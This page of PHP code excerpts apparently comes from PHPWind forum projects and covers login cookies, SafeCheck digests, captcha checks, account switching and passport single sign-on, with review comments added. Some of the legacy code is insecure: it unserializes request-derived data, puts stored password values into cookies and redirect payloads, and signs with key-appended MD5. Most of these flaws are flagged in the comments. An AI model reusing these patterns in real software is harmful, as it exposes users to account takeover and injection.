        //* $_cache->delete('UID_'.$winduid);
        initJob($winduid, "doUpdatedata");
        refreshto("profile.php?action=modify&info_type={$info_type}", 'operate_success', 2, true);
    }
}
コード例 #19
ファイル: register.php プロジェクト: jechiy/PHPWind
     } else {
         pwCache::setData(D_P . 'data/bbscache/ip_cache.php', "<?php die;?><{$timestamp}>\n<{$onlineip}>");
     }
 }
 //addonlinefile();
 if (GetCookie('userads') && $inv_linkopen && $inv_linktype == '1') {
     require_once R_P . 'require/userads.php';
 }
 if (GetCookie('o_invite') && $db_modes['o']['ifopen'] == 1) {
     list($o_u, $hash, $app) = explode("\t", GetCookie('o_invite'));
     if (is_numeric($o_u) && strlen($hash) == 18) {
         require_once R_P . 'require/o_invite.php';
     }
 }
 if ($rgyz == 1) {
     Cookie("winduser", StrCode($winduid . "\t" . PwdCode($windpwd) . "\t" . $safecv));
     Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
     Cookie('lastvisit', '', 0);
     //将$lastvist清空以将刚注册的会员加入今日到访会员中
     /*连续登录天数*/
     if ($db_md_ifopen) {
         require_once R_P . 'require/functions.php';
         doMedalBehavior($winduid, 'continue_login');
     }
 }
 //发送短消息
 if ($rg_config['rg_regsendmsg']) {
     $rg_config['rg_welcomemsg'] = str_replace('$rg_name', $regname, $rg_config['rg_welcomemsg']);
     M::sendNotice(array($windid), array('title' => "Welcome To[{$db_bbsname}]!", 'content' => $rg_config['rg_welcomemsg']));
 }
 //发送邮件
コード例 #20
ファイル: ucuseradd.php プロジェクト: sherlockhouse/aliyun
<?php

// Direct-access guard: only runs when included by a script that defined P_W.
!defined('P_W') && exit('Forbidden');
// No local user record yet, but a UCenter cookie is present: decode it and
// ask the UCenter client to check the uid / password-hash pair.
// NOTE(review): addslashes() is applied to the whole decoded string before it
// is split, so both fields reach uc_user_check() slash-escaped.
if (empty($detail) && GetCookie('ucuser')) {
    require_once R_P . 'uc_client/uc_client.php';
    list($winduid, $md5pwd) = explode("\t", addslashes(StrCode(GetCookie('ucuser'), 'DECODE')));
    $detail = uc_user_check($winduid, $md5pwd);
}
// A positive uid means the check succeeded: create the local account from the
// returned data, then reload it.
// NOTE(review): account creation here depends entirely on the integrity of the
// 'ucuser' cookie and on uc_user_check(); neither is visible in this file.
if ($detail['uid'] > 0) {
    $register = L::loadClass('Register', 'user');
    $register->appendUser($detail['uid'], $detail['username'], $detail['password'], $detail['email']);
    $detail = getUserByUid($detail['uid']);
}
コード例 #21
ファイル: weibobind.php プロジェクト: jechiy/PHPWind
/**
 * Set a new password for a Weibo-bound user and log the user in with it.
 *
 * Returns false when the login service reports that the reset failed, true
 * after the cookies have been set. Empty input is reported through Showmsg(),
 * which presumably ends the request - confirm.
 *
 * NOTE(review): nothing in this function ties $userId to the current session;
 * the caller must make sure the requester is allowed to reset this account.
 */
function weiboResetUserPassword($userId, $password, $repeatPassword)
{
    global $db_ckpath, $db_ckdomain;
    if ('' == $password || '' == $repeatPassword) {
        Showmsg('创建密码不能为空');
    }
    $rg_config = L::reg();
    // The configured length limits are unpacked but not read again in this
    // function; validation is left to $register->checkPwd().
    list($rg_regminpwd, $rg_regmaxpwd) = explode("\t", $rg_config['rg_pwdlen']);
    $register = L::loadClass('Register', 'user');
    $register->checkPwd($password, $repeatPassword);
    $weiboLoginService = L::loadClass('WeiboLoginService', 'sns/weibotoplatform/service');
    /* @var $weiboLoginService PW_WeiboLoginService */
    $isSuccess = $weiboLoginService->resetLoginUserPassword($userId, $password);
    if (!$isSuccess) {
        return false;
    }
    // Reload the record so the cookie is built from the stored password value.
    $userService = L::loadClass('UserService', 'user');
    /* @var $userService PW_UserService */
    $user = $userService->get($userId);
    Cookie("winduser", StrCode($userId . "\t" . PwdCode($user['password']) . "\t" . $user['safecv']));
    Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
    Cookie('lastvisit', '', 0);
    // automatic medal award - start
    require_once R_P . 'require/functions.php';
    doMedalBehavior($userId, 'continue_login');
    // automatic medal award - end
    return true;
}
コード例 #22
ファイル: bbsclose.php プロジェクト: sherlockhouse/aliyun
<?php

!function_exists('readover') && exit('Forbidden');
$bbsclose = true;
$AdminUser = GetCookie('AdminUser');
$CK = $AdminUser ? explode("\t", StrCode(GetCookie('AdminUser'), 'DECODE')) : array();
if (S::inArray($CK[1], $manager)) {
    $v_key = array_search($CK[1], $manager);
    SafeCheck($CK, PwdCode($manager_pwd[$v_key])) && ($bbsclose = false);
}
if (!$db_bbsifopen) {
    if ($_GET['logined'] && !$bbsclose) {
        Cookie('logined', 1, $timestamp + 1800);
    } elseif (!GetCookie('logined') || $bbsclose) {
        $skin = $skinco ? $skinco : $db_defaultstyle;
        $groupid = '';
        Showmsg($db_whybbsclose, $bbsclose ? NULL : 'bbsclose');
    }
} elseif ($db_bbsifopen == 2) {
    if ($db_visitopen) {
        $tmpAllowvisit = false;
        if ($db_visitips && $onlineip != 'Unknown') {
            $tmpIP = ip2long($onlineip);
            if ($tmpIP != -1 && $tmpIP !== FALSE) {
                $tmpVisitips = explode(',', $db_visitips);
                foreach ($tmpVisitips as $value) {
                    if (!trim($value)) {
                        continue;
                    }
                    $tmpSIP = ip2long(str_replace('*', '1', $value));
                    $tmpEIP = ip2long(str_replace('*', '255', $value));
コード例 #23
 /**
  * Run a topic-model field search and return the matching thread ids.
  *
  * $field is an encoded, serialized array of search values keyed like the
  * field definitions from postTopic::getFieldData(). Each non-empty value adds
  * one condition to a WHERE clause; the clause is then used for a count query,
  * a paged tid query and, when $alltidtype is set, an unpaged tid query.
  *
  * Returns array($count, $tiddb, $alltiddb). $count is -1 when nothing
  * matched. $tiddb and $alltiddb are only assigned inside the fetch loops, so
  * they are unset when no row was fetched.
  */
 function getSearchvalue($field, $type, $alltidtype = false, $backtype = false)
 {
     /* fetch search results */
     global $db_perpage, $page, $modelid, $fid, $basename;
     // NOTE(review): unserialize() on a value that may come from the request
     // (callers shown on this page pass a request parameter) allows PHP object
     // injection if the StrCode() encoding can be reproduced by a client.
     // Safer: a format without object support (JSON), or unserialize() with
     // allowed_classes disabled where the runtime supports it, plus an
     // is_array() check before the loop.
     $field = unserialize(StrCode($field, 'DECODE'));
     $sqladd = '';
     $fid && ($sqladd .= " fid=" . S::sqlEscape($fid));
     $fielddb = postTopic::getFieldData($modelid, $type);
     // Column names come from $fielddb and are concatenated unescaped; only
     // the values go through S::sqlEscape().
     // NOTE(review): a key that is missing from $fielddb is not skipped
     // explicitly; it falls through to the final else because its type is null.
     foreach ($field as $key => $value) {
         if ($value) {
             if (in_array($fielddb[$key]['type'], array('number', 'radio', 'select'))) {
                 // Exact match.
                 $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . "=" . S::sqlEscape($value) : $fielddb[$key]['fieldname'] . "=" . S::sqlEscape($value);
             } elseif ($fielddb[$key]['type'] == 'checkbox') {
                 // Join the ticked values with commas and match them as one
                 // ",a,b," substring; the joined string is escaped as a whole.
                 $checkboxs = '';
                 foreach ($value as $cv) {
                     $checkboxs .= $checkboxs ? ',' . $cv : $cv;
                 }
                 $value = '%,' . $checkboxs . ',%';
                 $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")" : $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")";
             } elseif ($fielddb[$key]['type'] == 'calendar' && ($value['start'] || $value['end'])) {
                 // Convert both bounds to timestamps; reject start > end when
                 // both are given.
                 $value['start'] && ($value['start'] = PwStrtoTime($value['start']));
                 $value['end'] && ($value['end'] = PwStrtoTime($value['end']));
                 if ($value['start'] > $value['end'] && $value['start'] && $value['end']) {
                     Showmsg('calendar_error');
                 }
                 $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['start']) . " AND " . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['end']) : $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['start']) . " AND " . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['end']);
             } elseif (in_array($fielddb[$key]['type'], array('text', 'url', 'email', 'textarea'))) {
                 // Substring match. NOTE(review): % and _ inside the value stay
                 // active as LIKE wildcards unless S::sqlEscape() handles them.
                 $value = '%' . $value . '%';
                 $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")" : $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")";
             } elseif ($fielddb[$key]['type'] == 'range' && $value['min'] && $value['max']) {
                 $sqladd .= $sqladd ? " AND " . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['min']) . " AND " . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['max']) : $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['min']) . " AND " . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['max']);
             } else {
                 $sqladd .= '';
             }
         }
     }
     if ($sqladd) {
         !$page && ($page = 1);
         $start = ($page - 1) * $db_perpage;
         $limit = S::sqlLimit($start, $db_perpage);
         $tablename = GetTopcitable($modelid);
         // $sqladd is non-empty in this branch, so the first arm is always taken.
         $sqladd .= $sqladd ? " AND ifrecycle=0" : " ifrecycle=0";
         $count = $this->db->get_value("SELECT COUNT(*) as count FROM {$tablename} WHERE {$sqladd}");
         $query = $this->db->query("SELECT tid FROM {$tablename} WHERE {$sqladd} {$limit}");
         while ($rt = $this->db->fetch_array($query)) {
             $tiddb[] = $rt['tid'];
         }
         if ($alltidtype) {
             // Same condition without the LIMIT: every matching tid.
             $query = $this->db->query("SELECT tid FROM {$tablename} WHERE {$sqladd}");
             while ($rt = $this->db->fetch_array($query)) {
                 $alltiddb[] = $rt['tid'];
             }
         }
         !$count && ($count = -1);
     } else {
         // No usable condition: report "nothing to search" (presumably both
         // message helpers end the request - confirm).
         if ($backtype) {
             adminmsg('topic_search_none', "{$basename}&action=topic&modelid={$modelid}");
         }
         Showmsg('topic_search_none');
     }
     return array($count, $tiddb, $alltiddb);
 }
コード例 #24
ファイル: login.php プロジェクト: adi00/wumaproject
 $logininfo = checkpass($pwuser, $md5_pwpwd, $safecv, $lgt);
 if (!is_array($logininfo)) {
     Showmsg($logininfo);
 }
 list($winduid, $groupid, $windpwd, $showmsginfo) = $logininfo;
 /*update cache*/
 $_cache = getDatastore();
 $_cache->delete("UID_" . $winduid);
 if (file_exists(D_P . "data/groupdb/group_{$groupid}.php")) {
     require_once Pcv(D_P . "data/groupdb/group_{$groupid}.php");
 } else {
     require_once D_P . "data/groupdb/group_1.php";
 }
 (int) $keepyear && ($cktime = '31536000');
 $cktime != 0 && ($cktime += $timestamp);
 Cookie("winduser", StrCode($winduid . "\t" . $windpwd . "\t" . $safecv), $cktime);
 Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
 //Cookie("ucuser",'cc',$cktime);
 Cookie('lastvisit', '', 0);
 //将$lastvist清空以将刚注册的会员加入今日到访会员中
 if ($db_autoban) {
     require_once R_P . 'require/autoban.php';
     autoban($winduid);
 }
 $_G['allowhide'] && $hideid ? Cookie('hideid', "1", $cktime) : Loginipwrite($winduid);
 (empty($jumpurl) || false !== strpos($jumpurl, $regurl)) && ($jumpurl = $db_bfn);
 if (GetCookie('o_invite') && $db_modes['o']['ifopen'] == 1) {
     list($o_u, $hash, $app) = explode("\t", GetCookie('o_invite'));
     if (is_numeric($o_u) && strlen($hash) == 18) {
         require_once R_P . 'require/o_invite.php';
     }
コード例 #25
ファイル: admincp.php プロジェクト: adi00/wumaproject
/**
 * Check a submitted verification code against the 'cknum' cookie (admin panel).
 *
 * The 'cknum' cookie is expired first, then its received value is decoded with
 * StrCode() and handed to SafeCheck() with a 300-second age limit. On failure
 * the AdminUser cookie is also expired (unless $t is falsy) and adminmsg() is
 * called with 'check_error'.
 *
 * NOTE(review): the challenge state lives only in the client cookie. If
 * SafeCheck() re-issues the cookie on success, as the SafeCheck variants on
 * this page do, the expiry sent here is superseded. Expiring a cookie also
 * leaves no server-side record that the code was used. Confirm whether
 * single use is enforced elsewhere.
 *
 * @param string $code Code typed by the user; compared upper-cased.
 * @param mixed  $t    Truthy to also expire the AdminUser cookie on failure.
 */
function GdConfirm($code, $t = 1)
{
    global $basename, $admin_file;

    Cookie('cknum', '', 0);

    if ($code) {
        $fields = explode("\t", StrCode(GetCookie('cknum'), 'DECODE'));
        if (SafeCheck($fields, strtoupper($code), 'cknum', 300)) {
            return;
        }
    }

    // Failed or missing code: optionally drop the admin session cookie, then
    // report the error against the admin entry script.
    if ($t) {
        Cookie('AdminUser', '', 0);
    }
    $basename = $admin_file;
    adminmsg('check_error');
}
コード例 #26
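/**
 * Validate a decoded, tab-separated check cookie and refresh it on success.
 *
 * $CK[0] is the issue time and $CK[2] is md5($PwdCode . issue time); any other
 * fields are carried through unchanged. On failure the cookie named $var is
 * expired. On success the time and digest are renewed and the cookie is
 * re-issued through StrCode().
 *
 * NOTE(review): the digest contains no server secret of its own, so tamper
 * resistance presumably rests on StrCode() — confirm.
 *
 * @param array  $CK      Cookie fields after decoding and splitting on tabs.
 * @param string $PwdCode Value the digest is bound to.
 * @param string $var     Cookie name to expire or refresh.
 * @param int    $expire  Maximum accepted age in seconds.
 * @return bool True when the cookie is fresh and its digest matches.
 */
function SafeCheck($CK, $PwdCode, $var = 'FLAdminUser', $expire = 1800)
{
    // Verify the password-bound digest
    global $timestamp;

    $valid = false;
    // A malformed cookie can decode to fewer fields or a non-numeric time;
    // reject it up front instead of doing arithmetic on it.
    if (is_array($CK) && isset($CK[0], $CK[2]) && is_numeric($CK[0])) {
        $expected = md5($PwdCode . $CK[0]);
        $given = (string) $CK[2];
        // Compare as strings. A loose != treats two digests of the form
        // "0e<digits>" as equal numbers. Use hash_equals() where available so
        // the comparison is also constant-time.
        $same = function_exists('hash_equals')
            ? hash_equals($expected, $given)
            : $expected === $given;
        $valid = $same && ($timestamp - $CK[0]) <= $expire;
    }

    if (!$valid) {
        Cookie($var, '', 0);
        return false;
    }

    $CK[0] = $timestamp;
    $CK[2] = md5($PwdCode . $timestamp);
    Cookie($var, StrCode(implode("\t", $CK)));
    return true;
}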
コード例 #27
ファイル: switchuser.php プロジェクト: jechiy/PHPWind
// Account switching between bound accounts: logs the current session in as
// another uid that shares a pw_userbinding id with the logged-in user, without
// asking for that account's password.
// Refuse direct access; P_W is expected to be defined by the including script.
!defined('P_W') && exit('Forbidden');
// presumably imports the request parameter 'uid' into $uid — confirm
S::gp(array('uid'));
$db_logintype = 2;
require_once R_P . 'require/checkpass.php';
// Binding id of the currently logged-in user ($winduid).
$id = $db->get_value("SELECT id FROM pw_userbinding WHERE uid=" . S::sqlEscape($winduid));
// The target $uid must have a row under the same binding id. This query is the
// only authorisation check visible in this script.
// NOTE(review): if no row matches, checkpass() below receives empty values.
// Confirm that it rejects them, or fail explicitly here.
$user = $db->get_one("SELECT s.password,m.uid,m.safecv FROM pw_userbinding s LEFT JOIN pw_members m ON s.uid=m.uid WHERE s.id=" . S::sqlEscape($id) . ' AND s.uid=' . S::sqlEscape($uid));
// The credential passed to checkpass() is the password stored in
// pw_userbinding, not one supplied with the request.
$logininfo = checkpass($user['uid'], $user['password'], $user['safecv'], 1);
if (!is_array($logininfo)) {
    // There is no break between the cases, so 'switchuser_error' falls through
    // to the default branch.
    // NOTE(review): this, and the list() below, rely on Showmsg() ending the
    // request — confirm.
    switch ($logininfo) {
        case 'login_forbid':
        case 'login_pwd_error':
            Showmsg('switchuser_error');
        default:
            Showmsg($logininfo);
    }
}
list($winduid, $groupid, $windpwd, $showmsginfo) = $logininfo;
// Seven days by default, 31536000 seconds (365 days) when $keepyear is set.
// $keepyear is not assigned in this script.
$cktime = 7 * 24 * 3600;
(int) $keepyear && ($cktime = 31536000);
$cktime != 0 && ($cktime += $timestamp);
// NOTE(review): as in the normal login path, the cookie embeds $windpwd from
// checkpass(). Confirm that Cookie() sets HttpOnly and Secure.
Cookie("winduser", StrCode($winduid . "\t" . $windpwd . "\t" . $user['safecv']), $cktime);
Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
//Cookie("ucuser",'cc',$cktime);
Cookie('lastvisit', '', 0);
// medal hook: start (the original comment is mis-encoded; presumably "get medal")
require_once R_P . 'require/functions.php';
doMedalBehavior($winduid, 'continue_login');
// medal hook: end
// AJAX reply: "ok", a tab, then the message returned by checkpass().
echo "ok\t{$showmsginfo}";
ajax_footer();
コード例 #28
ファイル: common.php プロジェクト: adi00/wumaproject
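/**
 * Validate a decoded, tab-separated check cookie and refresh it on success.
 *
 * $CK[0] is the issue time and $CK[2] is md5($PwdCode . issue time); any other
 * fields are carried through unchanged. On failure the cookie named $var is
 * expired. On success the time and digest are renewed and the cookie is
 * re-issued through StrCode().
 *
 * NOTE(review): the digest contains no server secret of its own, so tamper
 * resistance presumably rests on StrCode() — confirm.
 *
 * @param array  $CK      Cookie fields after decoding and splitting on tabs.
 * @param string $PwdCode Value the digest is bound to.
 * @param string $var     Cookie name to expire or refresh.
 * @param int    $expire  Maximum accepted age in seconds.
 * @return bool True when the cookie is fresh and its digest matches.
 */
function SafeCheck($CK, $PwdCode, $var = 'AdminUser', $expire = 1800)
{
    global $timestamp;

    $valid = false;
    // A malformed cookie can decode to fewer fields or a non-numeric time;
    // reject it up front instead of doing arithmetic on it.
    if (is_array($CK) && isset($CK[0], $CK[2]) && is_numeric($CK[0])) {
        $expected = md5($PwdCode . $CK[0]);
        $given = (string) $CK[2];
        // Compare as strings. A loose != treats two digests of the form
        // "0e<digits>" as equal numbers. Use hash_equals() where available so
        // the comparison is also constant-time.
        $same = function_exists('hash_equals')
            ? hash_equals($expected, $given)
            : $expected === $given;
        $valid = $same && ($timestamp - $CK[0]) <= $expire;
    }

    if (!$valid) {
        Cookie($var, '', 0);
        return false;
    }

    $CK[0] = $timestamp;
    $CK[2] = md5($PwdCode . $CK[0]);
    Cookie($var, StrCode(implode("\t", $CK)));
    return true;
}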
コード例 #29
// Passport (single sign-on) server side: packs the logged-in user's record into
// an encoded "userdb" parameter, signs it with the shared passport key and
// redirects the browser to the client site's passport_client.php.
// Only runs when passport is enabled and this site is the passport server.
if (!$db_pptifopen || $db_ppttype != 'server') {
    Showmsg('passport_close');
}
// Restore '=' characters that arrive as the HTML entity &#61;.
// NOTE(review): $jumpurl becomes the redirect base below and receives the whole
// userdb payload, including the stored password value. No validation of it is
// visible in this excerpt. Confirm it is limited to the configured passport
// client URL(s) before this point.
$jumpurl = str_replace('&#61;', '=', $jumpurl);
$userdb = array();
$userService = L::loadClass('UserService', 'user');
/* @var $userService PW_UserService */
$rt = $userService->get($winduid, true, true);
// Fields sent to the client site. 'password' is the stored value from the
// user record.
$userdb['uid'] = $rt['uid'];
$userdb['username'] = $rt['username'];
$userdb['password'] = $rt['password'];
$userdb['email'] = $rt['email'];
$userdb['rvrc'] = $rt['rvrc'];
$userdb['money'] = $rt['money'];
$userdb['credit'] = $rt['credit'];
$userdb['currency'] = $rt['currency'];
$userdb['time'] = $timestamp;
$userdb['cktime'] = $cktime ? $cktime : 'F';
// Serialise as key=value pairs joined by '&'.
// NOTE(review): values are not URL-encoded, so a value containing '&' or '='
// would change how the receiver splits the string. Confirm that username and
// email cannot contain those characters. Encoding here would require the
// client side to decode in step.
$userdb_encode = '';
foreach ($userdb as $key => $val) {
    $userdb_encode .= $userdb_encode ? "&{$key}={$val}" : "{$key}={$val}";
}
// presumably StrCode() reads $db_hash as its key, making the passport key the
// cipher key for this payload — confirm
$db_hash = $db_pptkey;
// Strip '=' from the encoded payload (looks like padding removal; verify against StrCode()).
$userdb_encode = str_replace('=', '', StrCode($userdb_encode));
// verify = md5(action . payload . forward . shared key).
// NOTE(review): this is plain MD5 with the key appended, and the fields are
// concatenated without delimiters. An HMAC over delimited fields with a
// current hash is the usual construction, and both sites would need to change
// together. The client side should also check 'time' to bound replay — confirm.
if ($action == 'login') {
    $verify = md5("login{$userdb_encode}{$forward}{$db_pptkey}");
    // NOTE(review): $ajax is appended without rawurlencode(), unlike the other parameters.
    ObHeader("{$jumpurl}/passport_client.php?action=login&userdb=" . rawurlencode($userdb_encode) . "&forward=" . rawurlencode($forward) . "&verify=" . rawurlencode($verify) . "&ajax={$ajax}");
} elseif ($action == 'quit') {
    $verify = md5("quit{$userdb_encode}{$forward}{$db_pptkey}");
    ObHeader("{$jumpurl}/passport_client.php?action=quit&userdb=" . rawurlencode($userdb_encode) . "&forward=" . rawurlencode($forward) . "&verify=" . rawurlencode($verify));
}
コード例 #30
ファイル: global.php プロジェクト: adi00/wumaproject
/**
 * Check a submitted verification code against the 'cknum' cookie (front end).
 *
 * The 'cknum' cookie is expired first, then its received value is decoded with
 * StrCode() and handed to SafeCheck() with an 1800-second age limit. A missing
 * or wrong code ends in Showmsg('check_error').
 *
 * NOTE(review): the challenge state lives only in the client cookie. If
 * SafeCheck() re-issues the cookie on success, as the SafeCheck variants on
 * this page do, the expiry sent here is superseded. Expiring a cookie also
 * leaves no server-side record that the code was used. Confirm whether
 * single use is enforced elsewhere.
 *
 * @param string $code Code typed by the user; compared upper-cased.
 */
function GdConfirm($code)
{
    Cookie('cknum', '', 0);

    $passed = false;
    if ($code) {
        $fields = explode("\t", StrCode(GetCookie('cknum'), 'DECODE'));
        $passed = SafeCheck($fields, strtoupper($code), 'cknum', 1800);
    }

    if (!$passed) {
        Showmsg('check_error');
    }
}